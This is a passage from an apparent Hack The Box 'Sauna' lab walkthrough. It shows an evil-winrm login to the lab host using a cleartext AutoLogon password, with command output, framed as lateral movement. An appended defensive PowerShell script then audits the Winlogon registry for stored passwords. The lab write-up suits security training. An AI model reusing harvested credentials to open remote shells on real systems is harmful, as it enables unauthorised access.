svc_loanmgr
The target system has AutoLogon configured for the svc_loanmgr user, along with a CLEARTEXT password.
┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ evil-winrm -i sauna.egotistical-bank.local -u svc_loanmgr -p 'Moneymakestheworldgoround!'
Evil-WinRM shell v3.4
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr
*evil-winrm* ps c:\Users\svc_loanmgr\Documents> hostname
SAUNA
*evil-winrm* ps c:\Users\svc_loanmgr\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::17a
ipv6 address. . . . . . . . . . . : dead:beef::64df:5bff:4879:1d8b
link-local ipv6 address . . . . . : fe80::64df:5bff:4879:1d8b%7
ipv4 address. . . . . . . . . . . : 10.10.10.175
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%7
10.10.10.2
Lateral movement made to the svc_loanmgr user.
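To audit a host for the AutoLogon finding noted above, the following added example (not part of the original notes) reads the standard Winlogon registry values and reports whether a cleartext `DefaultPassword` is stored, without ever printing it. The function name `Get-AutoLogonFinding` and the output field names are assumptions made for this example.

```powershell
# Added example: defensive audit of the Winlogon AutoLogon values.
# Run locally in an elevated PowerShell session on the host being checked.
$WinlogonPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-AutoLogonFinding {
    param([string]$Path = $WinlogonPath)

    $props = Get-ItemProperty -Path $Path -ErrorAction Stop

    # Values that are not set are absent from the returned object,
    # so look them up by name instead of assuming the property exists.
    $present = $props.PSObject.Properties.Name
    $value = @{}
    foreach ($name in 'AutoAdminLogon', 'DefaultDomainName', 'DefaultUserName', 'DefaultPassword') {
        if ($present -contains $name) {
            $value[$name] = [string]$props.$name
        } else {
            $value[$name] = $null
        }
    }

    $enabled = $value['AutoAdminLogon'] -eq '1'
    $stored  = -not [string]::IsNullOrEmpty($value['DefaultPassword'])
    $account = (@($value['DefaultDomainName'], $value['DefaultUserName']) |
                Where-Object { $_ }) -join '\'

    if ($stored) {
        $finding = 'Cleartext DefaultPassword present: remove the value and rotate the account password'
    } elseif ($enabled) {
        $finding = 'AutoLogon enabled, no cleartext DefaultPassword value'
    } else {
        $finding = 'AutoLogon not configured'
    }

    # The password itself is never returned or printed, only the fact that it is stored.
    [pscustomobject]@{
        ComputerName     = $env:COMPUTERNAME
        AutoLogonEnabled = $enabled
        Account          = $account
        CleartextStored  = $stored
        Finding          = $finding
    }
}

Get-AutoLogonFinding | Format-List
```

Where AutoLogon is genuinely required, Sysinternals Autologon stores the password as an LSA secret rather than in this registry value.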